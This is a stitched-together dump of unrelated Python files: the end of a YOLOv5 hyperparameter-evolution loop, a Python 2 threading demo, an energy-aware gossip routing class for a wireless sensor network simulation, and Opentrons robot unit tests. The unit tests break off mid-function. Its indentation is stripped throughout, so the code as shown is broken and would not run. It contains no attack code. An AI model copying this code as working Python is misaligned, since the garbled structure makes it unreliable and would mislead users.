# Select parent(s)
parent = 'single' # parent selection method: 'single' or 'weighted'
x = np.loadtxt('evolve.txt', ndmin=2)
n = min(5, len(x)) # number of previous results to consider
x = x[np.argsort(-fitness(x))][:n] # top n mutations
w = fitness(x) - fitness(x).min() # weights
if parent == 'single' or len(x) == 1:
# x = x[random.randint(0, n - 1)] # random selection
x = x[random.choices(range(n), weights=w)[0]] # weighted selection
elif parent == 'weighted':
x = (x * w.reshape(n, 1)).sum(0) / w.sum() # weighted combination
# Mutate
mp, s = 0.8, 0.2 # mutation probability, sigma
npr = np.random
npr.seed(int(time.time()))
g = np.array([x[0] for x in meta.values()]) # gains 0-1
ng = len(meta)
v = np.ones(ng)
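# Breakdown of the mutation expression below (illustrative):
#   g ....................... per-hyperparameter gain from `meta` (0 disables mutation)
#   (npr.random(ng) < mp) ... mutate each hyperparameter with probability mp (0.8)
#   npr.randn(ng) * npr.random() * s ... Gaussian perturbation with a random overall scale
#   + 1 ..................... centres each multiplier at 1.0 (no change)
#   .clip(0.3, 3.0) ......... bounds every multiplier to the range [0.3x, 3.0x]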
while all(v == 1): # mutate until a change occurs (prevent duplicates)
v = (g * (npr.random(ng) < mp) * npr.randn(ng) * npr.random() * s + 1).clip(0.3, 3.0)
for i, k in enumerate(hyp.keys()): # plt.hist(v.ravel(), 300)
hyp[k] = float(x[i + 7] * v[i]) # mutate
# Constrain to limits
for k, v in meta.items():
hyp[k] = max(hyp[k], v[1]) # lower limit
hyp[k] = min(hyp[k], v[2]) # upper limit
hyp[k] = round(hyp[k], 5) # significant digits
# Train mutation
results = train(hyp.copy(), opt, device, wandb=wandb)
# Write mutation results
print_mutation(hyp.copy(), results, yaml_file, opt.bucket)
# Plot results
plot_evolution(yaml_file)
print(f'Hyperparameter evolution complete. Best results saved as: {yaml_file}\n'
f'Command to train a new model with these hyperparameters: $ python run_yolov5_train.py --hyp {yaml_file}')
|
mtsleepD.py
|
#!/usr/bin/env python
import threading
from time import sleep, ctime
loops = [4,2]
class ThreadFunc(object):
def __init__(self, func, args, name=''):
self.name = name
self.func = func
self.args = args
def __call__(self):
self.func(*self.args)
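# ThreadFunc bundles a function and its arguments into a single callable, so an
# instance can be handed to threading.Thread as a zero-argument target and is
# invoked via __call__ when the thread starts.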
def loop(nloop, nsec):
print 'start loop', nloop, 'at:', ctime()
sleep(nsec)
print 'loop', nloop, 'done at:', ctime()
def main():
print 'starting at:', ctime()
threads=[]
nloops = range(len(loops))
for i in nloops:
t = threading.Thread(
target=ThreadFunc(loop, (i, loops[i]),
loop.__name__)
)
threads.append(t)
for i in nloops:
threads[i].start()
for i in nloops:
threads[i].join()
print 'all DONE at:', ctime()
if __name__ == '__main__':
main()
|
networkEAGPD.py
|
#!/usr/bin/env python3.7
"""
Router class is part of a dissertation work about WSNs
"""
__author__ = "Bruno Chianca Ferreira"
__license__ = "MIT"
__version__ = "0.1"
__maintainer__ = "Bruno Chianca Ferreira"
__email__ = "brunobcf@gmail.com"
import socket, os, math, struct, sys, json, traceback, zlib, fcntl, threading
import time
from apscheduler.schedulers.background import BackgroundScheduler
from collections import deque
class Network():
def __init__(self, Node, Battery, port=56123, tmax = 100, net_trans = 'ADHOC'):
'Initializes the properties of the Node object'
#### SENSOR ###############################################################################
self.Node = Node
self.visible = [] #our visibble neighbours
self.messages_created = [] #messages created by each node
self.messages_delivered = [] #messages delivered at the sink
self.messages = []
self.average = 0
self.visible_timeout = 3 * (Node.sleeptime / 1000) #timeout when visible neighbours should be removed from list in ms
#### NETWORK ##############################################################################
self.net_trans = net_trans #adhoc or sixLoWPANLink
#print(self.net_trans)
if self.net_trans == 'ADHOC':
self.bcast_group = '10.0.0.255' #broadcast ip address
elif self.net_trans == 'SIXLOWPANLINK':
self.bcast_group = 'ff02::1'
self.port = port # UDP port
self.max_packet = 65535 #max packet size to listen
#### UTILITIES ############################################################################
self.scheduler = BackgroundScheduler()
self.scheduler.start()
self.monitor_mode = False #when this is true a lot of messages polute the screen
self.protocol_stats = [0,0,0,0,0,0] #created, forwarded, delivered, discarded, digest sent, request attended
self.errors = [0,0,0]
self.myip = ''
#### Protocol specific ####################################################################
self.ttl = 8
self.fanout_max = 3
self.tmax = tmax * Node.second # maximum time interval a node may wait before sending a message (milliseconds)
self.tnext = self.tmax # time interval the local node will wait before forwarding the current message (milliseconds)
self.bt_level = [] # Battery level in node i (in a range between 1 and 10, where 1 means that remains less than 10% of battery)
self.v_bt = [] #A vector containing the energy level of all neighbour nodes ## NOT NEEDED IN THIS IMPLEMENTATION
self.mode = "eager" #1 -> eager, 0 ->lazy Starts lazy, later check if should be changed to eager
self.netRatio = 0 # ratio -> forwarded / discarded
self.tSinkMax = 500 #max time sink without new message, after that stop simulation
self.tSinkCurrent = 0 #current time with no new message
self.packets = 0
self.traffic = 0
self.battery_percent_old = 0
self.backlog = deque([],5000)
self.history = deque([],1000)
self.digest = deque([],1000)
self.digests_received = deque([],5000)
##################### END OF DEFAULT SETTINGS ###########################################################
self._setup() #Try to get settings from file
self.t2 = threading.Thread(target=self._listener, args=())
self.t2.start()
self.scheduler.add_job(self._digest, 'interval', seconds = (self.tmax * 10) / 1000, id='digest')
######## PUBLIC ##############################################################################
def awake_callback(self):
'Callback function ran when the node wakes up'
if (self.Node.role!="sink"):
if len(self.visible) > 0: #only change state if it has any visible
self._update_visible() #clean the list of visible
self.tnext = self._calc_tnext()
if self.Node.Battery.battery_percent != self.battery_percent_old:
self._update_mode()
self.battery_percent_old = self.Node.Battery.battery_percent
else:
self._checkNewMessage()
def dispatch(self, payload):
'Public method available for sending messages. '
self._sender(payload)
def shutdown(self):
'Public method available for shuting down a node'
self.t2.join(timeout=2)
self.scheduler.shutdown()
def printvisible(self):
'Prints visible nodes'
print("Visible neighbours at:" + str(self.Node.simulation_seconds) )
print("===============================================================================")
print("|IP\t\t|Last seen\t|Battery level")
print("-------------------------------------------------------------------------------")
for member in range(len(self.visible)):
print ("|"+self.visible[member][0]+"\t|"+str(self.visible[member][1])+"\t\t|"+str(self.visible[member][2]))
print("===============================================================================")
def printinfo(self):
'Prints general information about the network layer'
print()
print("EAGPD - Routing agent")
print()
#print("current value: \t\t{0:5.2f}".format(self.value))
print("battery level: \t\t{0:5.2f} Joules".format(self.Node.Battery.battery_energy))
print("battery level: \t\t{0:5.2f} %".format(self.Node.Battery.battery_percent))
print("average level: \t\t{0:5.2f} 0-100".format(self.average))
print("node tmax: \t\t" + str(self.tmax/self.Node.multiplier)+ " ms in virtual time")
print("node tnext: \t\t" + str(self.tnext/self.Node.multiplier)+ " ms in virtual time")
#print("local address: \t\t"+str(self.myip))
print("node mode: \t\t" + str(self.mode))
print("node ttl max: \t\t" + str(self.ttl))
#print("udp port: \t\t"+str(self.port))
if self.Node.role == 'mote':
print("msgs created: \t\t"+str(self.protocol_stats[0]))
print("msgs forwarded: \t"+str(self.protocol_stats[1]))
print("msgs discarded: \t"+str(self.protocol_stats[3]))
print("digests sent: \t\t"+str(self.protocol_stats[4]))
print("digests buffer: \t"+str(len(self.digest)))
print("request attended: \t"+str(self.protocol_stats[5]))
print("msgs buffer: \t\t"+str(len(self.scheduler.get_jobs())))
elif self.Node.role == 'sink':
print("msgs delivered: \t"+str(self.protocol_stats[2]))
print("starvation time: \t"+str(self.tSinkCurrent))
print("starvation max: \t"+str(self.tSinkMax))
print("Network ratio: \t\t"+str(self.netRatio))
print("errors: \t\t" + str(self.errors[0]) + ','+ str(self.errors[1]) + ',' + str(self.errors[2]))
print()
print("Network ratio is just the number of discarded messages divided by")
print("the number of created messages. A node with high ratio is busier.")
print()
######## PRIVATE ##############################################################################
def _listener(self):
'This method opens a UDP socket to receive data. It runs in an infinite loop for as long as the node is up'
addrinfo = socket.getaddrinfo(self.bcast_group, None)[1]
listen_socket = socket.socket(addrinfo[0], socket.SOCK_DGRAM) #UDP
listen_socket.bind(('', self.port))
self.myip = self._get_ip('eth0')
#self.myip = self._get_ip(str(self.Node.tag)+'-wlan0')
if (self.net_trans=='SIXLOWPANLINK'):
group_bin = socket.inet_pton(addrinfo[0], addrinfo[4][0])
mreq = group_bin + struct.pack('@I', 0)
listen_socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
while self.Node.lock: # this infinite loop handles received packets for as long as the node is up
payload, sender = listen_socket.recvfrom(self.max_packet)
payload = json.loads(payload.decode())
sender_ip = str(sender[0])
self.packets += 1
self._packet_handler(payload, sender_ip)
listen_socket.close()
def _sender(self, payload, fasttrack=False):
'This method sends an epidemic message with the data read by the sensor'
start = time.monotonic_ns()/1000000
addrinfo = socket.getaddrinfo(self.bcast_group, None)[1]
#getting the first one [0] is related to stream, [1] dgram and [2] raw
#addrinfo[0] is the address family, which is same for stream dgram ow raw
sender_socket = socket.socket(addrinfo[0], socket.SOCK_DGRAM)
if (self.net_trans=='SIXLOWPANLINK'):
ttl_bin = struct.pack('@i', 1) #ttl=1
sender_socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_MULTICAST_HOPS, ttl_bin)
elif (self.net_trans=='ADHOC'):
sender_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
msg_id = zlib.crc32(str((self.Node.simulation_seconds+payload)).encode())
self.messages_created.append([hex(msg_id),self.Node.simulation_seconds])
if fasttrack:
bytes_to_send = json.dumps([4 , hex(msg_id), self.Node.tag, 0, self.Node.simulation_seconds, self.ttl, self.Node.Battery.battery_percent,'',0, payload]).encode()
else:
bytes_to_send = json.dumps([2 , hex(msg_id), self.Node.tag, 0, self.Node.simulation_seconds, self.ttl, self.Node.Battery.battery_percent,'',0, payload]).encode()
sender_socket.sendto(bytes_to_send, (addrinfo[4][0], self.port))
self.Node.Battery.communication_energy += self.Node.Battery.battery_drainer(self.Node.Battery.modemSleep_current, start, self.Node.Battery.tx_time * self.Node.Battery.tx_current)
sender_socket.close()
def _packet_sender(self, packet, fasttrack=False):
'Re-broadcasts an already-built packet (e.g. when forwarding or answering a digest request) instead of creating a new message'
start = time.monotonic_ns()/1000000
addrinfo = socket.getaddrinfo(self.bcast_group, None)[1]
sender_socket = socket.socket(addrinfo[0], socket.SOCK_DGRAM)
if (self.net_trans=='SIXLOWPANLINK'):
ttl_bin = struct.pack('@i', 1) #ttl=1
sender_socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_MULTICAST_HOPS, ttl_bin)
elif (self.net_trans=='ADHOC'):
sender_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
if fasttrack:
bytes_to_send = json.dumps([4 , packet[1], packet[2], packet[3], packet[4], self.ttl, self.Node.Battery.battery_percent,'',packet[8], packet[9]]).encode()
else:
bytes_to_send = json.dumps([2 , packet[1], packet[2], packet[3], packet[4], self.ttl, self.Node.Battery.battery_percent,'',packet[8], packet[9]]).encode()
sender_socket.sendto(bytes_to_send, (addrinfo[4][0], self.port))
self.Node.Battery.communication_energy += self.Node.Battery.battery_drainer(self.Node.Battery.modemSleep_current, start, self.Node.Battery.tx_time * self.Node.Battery.tx_current)
sender_socket.close()
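# Packet layout used throughout this protocol (inferred from _sender and _packet_handler):
#   [0] message type: 1 = digest, 2 = gossip/data, 3 = request, 4 = fast-track
#   [1] message id (hex CRC32 of the creation time plus payload)
#   [2] origin node tag
#   [3] unused (always 0 here)
#   [4] creation time in simulation seconds
#   [5] TTL, decremented at each hop
#   [6] sender battery level (percent)
#   [7] last-hop IP, filled in by the receiving node
#   [8] hop count, incremented at each hop
#   [9] payload (or a list of message ids for digests and requests)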
def _packet_handler(self, packet, sender_ip):
'When a message of type gossip is received from neighbours this method unpacks and handles it'
start = time.monotonic_ns()/1000000
packet[5] -= 1 # Decrement TTL
packet[8] += 1 #Increase hops
if (packet[2] != self.Node.tag):
if len(self.visible) > 0: #list no empty, check if already there
not_there = 1
for element in range(len(self.visible)):
if sender_ip == self.visible[element][0]: #if there...
self.visible[element][1] = self.Node.simulation_seconds # refresh timestamp
self.visible[element][2] = packet[6] # refresh battery level
not_there = 0
break
if not_there:
self.visible.append([sender_ip, self.Node.simulation_seconds, packet[6]])
else: #Empty neighbours list, add
self.visible.append([sender_ip, self.Node.simulation_seconds, packet[6]])
if self.Node.role == "sink":
self._sink(packet)
else:
self._node_message(packet)
if packet[5] <= 0: #check if ttl is over
self.protocol_stats[3] +=1
elif packet[7] != self.myip: #check if came from me before
packet[7] = sender_ip
if packet[0] == 3: #is it a request?
for id in packet[9]:
for message in self.backlog:
if id in message:
#print(id + " id and message: " + str(message))
self.protocol_stats[5] +=1
self._packet_sender(message, fasttrack=False)
self.backlog.remove(message)
break
if (packet[0] == 1): #is it a digest?
if packet[1] not in self.digests_received:
self.digests_received.append(packet[1])
request = []
for id in packet[9]:
for message in self.history:
if id in message:
break
else:
request.append(id)
if (len(request) > 0):
self._send_request(request)
if self.monitor_mode: print("sent a request with size: " + str(len(request)))
self._forwarder(packet)
return
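                # Forwarding policy: fasttrack packets go out immediately; otherwise the first sighting of a
                # message id schedules a delayed forward after tnext ms, and a second sighting before it fires
                # cancels that job (eager mode) or stores the message in the backlog/digest for later pull (lazy mode).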
if packet[0] == 4: #fasttrack, send it pronto
self._forwarder(packet)
else:
if self.mode == 'eager':
try:
self.scheduler.remove_job(packet[1])
self.protocol_stats[3] +=1
except:
self.scheduler.add_job(self._forwarder, 'interval', seconds = self.tnext/1000, id=packet[1], args=[packet])
pass
elif self.mode == 'lazy':
try:
self.scheduler.remove_job(packet[1])
self.protocol_stats[3] +=1
if packet[0] == 2:
if packet[8] <= self.ttl:
self.backlog.append(packet)
self.digest.append(packet[1])
except:
self.scheduler.add_job(self._forwarder, 'interval', seconds = self.tnext/1000, id=packet[1], args=[packet])
pass
else:
self.protocol_stats[3] +=1
self.Node.Battery.communication_energy += self.Node.Battery.battery_drainer(0, start, self.Node.Battery.rx_current * self.Node.Battery.rx_time)
self.Node.Battery.computational_energy += self.Node.Battery.battery_drainer(self.Node.Battery.modemSleep_current, start)
def _sink(self, packet):
'Handles messages received at the sink'
# This method does not use energy, only for simulation statistics
if (packet[0] == 1):
if packet[1] not in self.digests_received:
self.digests_received.append(packet[1])
request = []
for id in packet[9]:
for message in self.messages_delivered:
if id in message:
break
else:
request.append(id)
if (len(request) > 0):
self._send_request(request)
if self.monitor_mode: print("sent a request with size: " + str(len(request)))
return
else: return
elif (packet[0] == 3):
return
if len(self.messages_delivered) > 0:
for element in range(len(self.messages_delivered)): #check if it's a new message
if self.messages_delivered[element][0] == packet[1]: #we already delivered that one
self.messages_delivered[element][4] += 1 #increment counter
if (packet[8]>self.messages_delivered[element][5]): #calculate max and min hops
self.messages_delivered[element][5]=packet[8]
elif (packet[8]<self.messages_delivered[element][6]):
self.messages_delivered[element][6]=packet[8]
self.protocol_stats[2] += 1
not_delivered = False
break
else: #new message
not_delivered = True
else: #fresh list, add directly
not_delivered = True
if not_delivered:
self.messages_delivered.append([packet[1],packet[2],packet[4],self.Node.simulation_seconds,1,packet[8],packet[8]]) #add with counter 1
self.protocol_stats[2] += 1
self.tSinkCurrent = 0
def _node_message(self, packet):
if len(self.messages) > 0:
for element in range(len(self.messages)): #check if it's a new message
if self.messages[element][0] == packet[1]: #we already delivered that one
self.messages[element][4] += 1 #increment counter
if (packet[8]>self.messages[element][5]): #calculate max and min hops
self.messages[element][5]=packet[8]
elif (packet[8]<self.messages[element][6]):
self.messages[element][6]=packet[8]
not_delivered = False
break
else: #new message
not_delivered = True
else: #fresh list, add directly
not_delivered = True
if not_delivered:
self.history.append(packet[1])
self.messages.append([packet[1],packet[2],packet[4],self.Node.simulation_seconds,1,packet[8],packet[8]]) #add with counter 1
def _forwarder(self, packet):
        'This method forwards a received gossip packet to all neighbours'
start = time.monotonic_ns()/1000000
        addrinfo = socket.getaddrinfo(self.bcast_group, None)[1]  # one entry per socket type: [0] stream, [1] dgram, [2] raw
#addrinfo[0] is the address family, which is same for stream dgram ow raw
forwarder_socket = socket.socket(addrinfo[0], socket.SOCK_DGRAM)
if (self.net_trans=='SIXLOWPANLINK'):
ttl_bin = struct.pack('@i', 1) #ttl=1
forwarder_socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_MULTICAST_HOPS, ttl_bin)
elif (self.net_trans=='ADHOC'):
forwarder_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
bytes_to_send = json.dumps([packet[0] , packet[1], packet[2], packet[3], packet[4], packet[5], self.Node.Battery.battery_percent, packet[7], packet[8], packet[9]]).encode()
forwarder_socket.sendto(bytes_to_send, (addrinfo[4][0], self.port))
self.protocol_stats[1] += 1
forwarder_socket.close()
self.Node.Battery.communication_energy += self.Node.Battery.battery_drainer(self.Node.Battery.modemSleep_current, start, self.Node.Battery.tx_time * self.Node.Battery.tx_current)
try:
self.scheduler.remove_job(packet[1])
except:
if self.monitor_mode == True: print("FWD - Issue trying to remove fwd task")
self.errors[2] += 1
pass
def _digest(self):
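        # Broadcast a type-1 digest listing the ids of messages held back in lazy mode; receivers compare
        # it against their history and pull anything missing with a type-3 request.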
start = time.monotonic_ns()/1000000
if len(self.digest) < 1: #do nothing if there is no digest
return
addrinfo = socket.getaddrinfo(self.bcast_group, None)[1]
digest_socket = socket.socket(addrinfo[0], socket.SOCK_DGRAM)
if (self.net_trans=='SIXLOWPANLINK'):
ttl_bin = struct.pack('@i', 1) #ttl=1
digest_socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_MULTICAST_HOPS, ttl_bin)
elif (self.net_trans=='ADHOC'):
digest_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
msg_id = zlib.crc32(str((self.Node.simulation_seconds)).encode())
bytes_to_send = json.dumps([1 , hex(msg_id), self.Node.tag, 0, self.Node.simulation_seconds, self.ttl, self.Node.Battery.battery_percent,'',0, list(self.digest)]).encode()
self.digest.clear()
digest_socket.sendto(bytes_to_send, (addrinfo[4][0], self.port))
self.protocol_stats[4] += 1
digest_socket.close()
self.Node.Battery.communication_energy += self.Node.Battery.battery_drainer(self.Node.Battery.modemSleep_current, start, self.Node.Battery.tx_time * self.Node.Battery.tx_current)
def _send_request(self, request):
start = time.monotonic_ns()/1000000
addrinfo = socket.getaddrinfo(self.bcast_group, None)[1]
request_socket = socket.socket(addrinfo[0], socket.SOCK_DGRAM)
if (self.net_trans=='SIXLOWPANLINK'):
ttl_bin = struct.pack('@i', 1) #ttl=1
request_socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_MULTICAST_HOPS, ttl_bin)
elif (self.net_trans=='ADHOC'):
request_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
msg_id = zlib.crc32(str((self.Node.simulation_seconds)).encode())
bytes_to_send = json.dumps([3 , hex(msg_id), self.Node.tag, 0, self.Node.simulation_seconds, self.ttl, self.Node.Battery.battery_percent,'',0, request]).encode()
request_socket.sendto(bytes_to_send, (addrinfo[4][0], self.port))
#self.protocol_stats[4] += 1
request_socket.close()
self.Node.Battery.communication_energy += self.Node.Battery.battery_drainer(self.Node.Battery.modemSleep_current, start, self.Node.Battery.tx_time * self.Node.Battery.tx_current)
def _checkNewMessage(self):
        'Checks whether the sink is still receiving messages; if not, ends the simulation'
        #this is for sink only
        if (self.tSinkCurrent > self.tSinkMax):  # maximum time without a new message: shut down the simulation
self.Node.lock = False
def _update_visible(self):
        'Update the energy state for the local cluster: old nodes are removed and the local average recalculated'
start = time.monotonic_ns()/1000000
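        # Drop at most one stale neighbour per call (the loop breaks right after deleting, avoiding
        # skipped entries while mutating the list), then recompute the cluster average/min/max battery.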
for member in range(len(self.visible)):
if (self.Node.simulation_seconds- self.visible[member][1] > self.visible_timeout):
del self.visible[member]
break
self.average = 0
self.n_vis = len(self.visible)
self.bmax = self.Node.Battery.battery_percent
self.bmin = self.Node.Battery.battery_percent
for member in range(self.n_vis):
self.average += self.visible[member][2]
if self.visible[member][2] > self.bmax:
self.bmax = self.visible[member][2] #when bmax is 0, this should always happen
elif self.visible[member][2] < self.bmin:
self.bmin = self.visible[member][2] #
if self.n_vis > 0:
self.average = round(self.average / (self.n_vis))
else:
self.average = self.Node.Battery.battery_percent
self.Node.Battery.computational_energy +=self.Node.Battery.battery_drainer(self.Node.Battery.modemSleep_current, start)
def _update_mode(self):
'Update eager/lazy push modes'
start = time.monotonic_ns()/1000000
try:
self.netRatio = self.protocol_stats[3] / self.protocol_stats[1]
except:
self.netRatio = 1
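        # The push mode depends only on battery level: at or above the local cluster average -> eager, below -> lazy.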
if (self.Node.Battery.battery_percent >= self.average):
self.mode = "eager"
else:
self.mode = "lazy"
self.Node.Battery.computational_energy +=self.Node.Battery.battery_drainer(self.Node.Battery.modemSleep_current, start)
def _calc_tnext(self):
        'Calculate tnext for an eager node'
start = time.monotonic_ns()/1000000
self.tnext = self.tmax
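        # tnext shrinks linearly as this node's battery approaches the cluster maximum: the best-charged
        # node forwards almost immediately (clamped to 50 ms below), the weakest waits the full tmax.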
if self.mode == "eager":
if (self.bmax != self.bmin):
self.tnext = self.tmax - (self.tmax * (self.Node.Battery.battery_percent-self.bmin) / (self.bmax-self.bmin))
if self.tnext == 0:
self.tnext = 50
self.Node.Battery.computational_energy +=self.Node.Battery.battery_drainer(self.Node.Battery.modemSleep_current, start)
return self.tnext
def _get_ip(self,iface = 'eth0'):
'Gets ip address'
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sockfd = sock.fileno()
SIOCGIFADDR = 0x8915
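        # SIOCGIFADDR asks the kernel for the interface's IPv4 address; the ifreq buffer packs the
        # 16-byte interface name, the address family and zero padding.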
ifreq = struct.pack('16sH14s', iface.encode('utf-8'), socket.AF_INET, b'\x00'*14)
try:
res = fcntl.ioctl(sockfd, SIOCGIFADDR, ifreq)
except:
traceback.print_exc()
return None
ip = struct.unpack('16sH2x4s8x', res)[2]
return socket.inet_ntoa(ip)
def _setup(self):
'Initial setup'
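        # Example settings.json (hypothetical values; the keys are the ones read below):
        #   {"sink_starvation": 300, "fan_out_max": 4, "ttl": 10}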
        with open("settings.json", "r") as settings_file:
            settings = json.loads(settings_file.read())
self.tSinkMax = settings['sink_starvation']
self.fanout_max = settings['fan_out_max']
self.ttl = settings['ttl']
|
test_robot.py
|
import threading
import unittest
from unittest import mock
from opentrons.robot.robot import Robot
from opentrons.containers.placeable import Deck
from opentrons import instruments, containers
from opentrons.util.vector import Vector
class RobotTest(unittest.TestCase):
def setUp(self):
Robot.reset_for_tests()
self.robot = Robot.get_instance()
self.robot.reset()
self.robot.connect()
self.robot.home(enqueue=False)
def test_add_container(self):
c1 = self.robot.add_container('96-flat', 'A1')
res = self.robot.containers()
expected = {
'96-flat': c1
}
self.assertEquals(res, expected)
c2 = self.robot.add_container('96-flat', 'A2', 'my-special-plate')
res = self.robot.containers()
expected = {
'96-flat': c1,
'my-special-plate': c2
}
self.assertEquals(res, expected)
def test_comment(self):
self.robot.clear_commands()
self.robot.comment('hello')
self.assertEquals(len(self.robot.commands()), 1)
self.assertEquals(self.robot._commands[0].description, 'hello')
def test_home_after_disconnect(self):
self.robot.disconnect()
self.assertRaises(RuntimeError, self.robot.home)
def test_simulate(self):
self.robot.disconnect()
p200 = instruments.Pipette(axis='b', name='my-fancy-pancy-pipette')
p200.aspirate().dispense()
self.robot.simulate()
self.assertEquals(len(self.robot._commands), 2)
self.assertEquals(self.robot.connections['live'], None)
def test_stop_run(self):
p200 = instruments.Pipette(axis='b', name='my-fancy-pancy-pipette')
p200.calibrate_plunger(top=0, bottom=5, blow_out=6, drop_tip=7)
for i in range(1000):
p200.aspirate().dispense()
res = None
def _run():
nonlocal res
self.assertRaises(RuntimeError, self.robot.run)
thread = threading.Thread(target=_run)
thread.start()
self.robot.stop()
thread.join()
def test_exceptions_during_run(self):
p200 = instruments.Pipette(axis='b', name='my-fancy-pancy-pipette')
def _do():
return 'hello' / 3
p200.create_command(
do=_do,
enqueue=True)
self.assertRaises(RuntimeError, self.robot.run)
def test_calibrated_max_dimension(self):
expected = self.robot._deck.max_dimensions(self.robot._deck)
res = self.robot._calibrated_max_dimension()
self.assertEquals(res, expected)
p200 = instruments.Pipette(axis='b', name='my-fancy-pancy-pipette')
plate = containers.load('96-flat', 'A1')
self.robot.move_head(x=10, y=10, z=10)
p200.calibrate_position((plate, Vector(0, 0, 0)))
res = self.robot._calibrated_max_dimension()
expected = Vector(plate.max_dimensions(plate)) + Vector(10, 10, 10)
self.assertEquals(res, expected)
def test_create_arc(self):
p200 = instruments.Pipette(axis='b', name='my-fancy-pancy-pipette')
plate = containers.load('96-flat', 'A1')
plate2 = containers.load('96-flat', 'B1')
self.robot.move_head(x=10, y=10, z=10)
p200.calibrate_position((plate, Vector(0, 0, 0)))
self.robot.move_head(x=10, y=10, z=100)
p200.calibrate_position((plate2, Vector(0, 0, 0)))
res = self.robot._create_arc((0, 0, 0), plate[0])
expected = [
{'z': 100},
{'x': 0, 'y': 0},
{'z': 0}
]
self.assertEquals(res, expected)
res = self.robot._create_arc((0, 0, 0), plate[0])
expected = [
{'z': 20.5 + 5},
{'x': 0, 'y': 0},
{'z': 0}
]
self.assertEquals(res, expected)
def test_disconnect(self):
self.robot.disconnect()
res = self.robot.is_connected()
self.assertEquals(bool(res), False)
def test_get_connected_port(self):
res = self.robot.get_connected_port()
self.assertEquals(res, self.robot.VIRTUAL_SMOOTHIE_PORT)
def test_robot_move_to(self):
self.robot.move_to((Deck(), (100, 0, 0)))
self.robot.run()
position = self.robot._driver.get_head_position()['current']
self.assertEqual(position, (100, 0, 0))
def test_move_head(self):
self.robot.move_head(x=100, y=0, z=20)
current = self.robot._driver.get_head_position()['current']
self.assertEquals(current, (100, 0, 20))
def test_home(self):
self.robot.disconnect()
self.robot.connect()
self.assertDictEqual(self.robot.axis_homed, {
'x': False, 'y': False, 'z': False, 'a': False, 'b': False
})
self.robot.clear_commands()
self.robot.home('xa', enqueue=True)
self.assertDictEqual(self.robot.axis_homed, {
'x': False, 'y': False, 'z': False, 'a': False, 'b': False
})
self.assertEquals(len(self.robot._commands), 1)
self.robot.run()
self.assertDictEqual(self.robot.axis_homed, {
'x': True, 'y': False, 'z': False, 'a': True, 'b': False
})
self.robot.clear_commands()
self.robot.home(enqueue=False)
self.assertEquals(len(self.robot._commands), 0)
self.assertDictEqual(self.robot.axis_homed, {
'x': True, 'y': True, 'z': True, 'a': True, 'b': True
})
def test_robot_pause_and_resume(self):
self.robot.move_to((Deck(), (100, 0, 0)), enqueue=True)
self.robot.move_to((Deck(), (101, 0, 0)), enqueue=True)
self.assertEqual(len(self.robot._commands), 2)
self.robot.pause()
def _run():
self.robot.run()
thread = threading.Thread(target=_run)
thread.start()
self.robot.resume()
thread.join(0.5)
self.assertEquals(thread.is_alive(), False)
self.assertEqual(len(self.robot._commands), 2)
self.robot.clear_commands()
self.assertEqual(len(self.robot._commands), 0)
self.robot.move_to((Deck(), (100, 0, 0)), enqueue=True)
self.robot.move_to((Deck(), (101, 0, 0)), enqueue=True)
def _run():
self.robot.run()
self.robot.pause()
thread = threading.Thread(target=_run)
thread.start()
thread.join(0.01)
self.assertEquals(thread.is_alive(), True)
self.assertEqual(len(self.robot._commands) > 0, True)
self.robot.resume()
thread.join(1)
self.assertEqual(len(self.robot._commands), 2)
def test_versions(self):
res = self.robot.versions()
expected = {
'config': {
'version': 'v1.2.0',
'compatible': True
},
'firmware': {
'version': 'v1.0.5',
'compatible': True
},
'ot_version': {
'version': 'one_pro',
'compatible': True
}
}
self.assertDictEqual(res, expected)
def test_diagnostics(self):
res = self.robot.diagnostics()
expected = {
'axis_homed': {
'x': True, 'y': True, 'z': True, 'a': True, 'b': True
},
'switches': {
'x': False,
'y': False,
'z': False,
'a': False,
'b': False
},
'steps_per_mm': {
'x': 80.0,
'y': 80.0
}
}
self.assertDictEqual(res, expected)
self.robot.disconnect()
self.robot.connect()
self.assertRaises(RuntimeWarning, self.robot.move_head, x=-199)
res = self.robot.diagnostics()
expected = {
'axis_homed': {
'x': False, 'y': False, 'z': False, 'a': False, 'b': False
},
'switches': {
'x': True,
'y': False,
'z': False,
'a': False,
'b': False
},
'steps_per_mm': {
'x': 80.0,
'y': 80.0
}
}
self.assertDictEqual(res, expected)
self.robot.home('x', enqueue=False)
res = self.robot.diagnostics()
expected = {
'axis_homed': {
'x': True, 'y': False, 'z': False, 'a': False, 'b': False
},
'switches': {
'x': False,
'y': False,
'z': False,
'a': False,
'b': False
},
'steps_per_mm': {
'x': 80.0,
'y': 80.0
}
}
self.assertDictEqual(res, expected)
def test_get_motor_caching(self):
a_motor = self.robot.get_motor('a')
self.assertEqual(a_motor, self.robot.get_motor('a'))
b_motor = self.robot.get_motor('b')
self.assertEqual(b_motor, self.robot.get_motor('b'))
def test_get_mosfet_caching(self):
m0 = self.robot.get_mosfet(0)
self.assertEqual(m0, self.robot.get_mosfet(0))
m1 = self.robot.get_mosfet(1)
self.assertEqual(m1, self.robot.get_mosfet(1))
@mock.patch('requests.get')
@mock.patch('requests.post')
def test_send_to_app_with_unconfigured_robot(self, req_get, req_post):
def fake_get(url, data, headers):
res = mock.Mock()
res.ok = True
return res
def fake_post(*args, **kwargs):
res = mock.Mock()
res.ok = True
return res
req_get.side_effect = fake_get
req_post.side_effect = fake_post
self.robot.send_to_app()
self.assertTrue(req_get.called)
self.assertTrue(req_post.called)
@mock.patch('requests.get')
@mock.patch('requests.post')
def test_send_to_app_with_configured_robot(self, req_get, req_post):
def fake_get(url, data, headers):
res = mock.Mock()
res.ok = True
return res
def fake_post(*args, **kwargs):
res = mock.Mock()
res.ok = True
return res
plate = containers.load('96-flat', 'A1')
p200 = instruments.Pipette(axis='b', max_volume=200)
for well in plate:
p200.aspirate(well).delay(5).dispense(well)
req_get.side_effect = fake_get
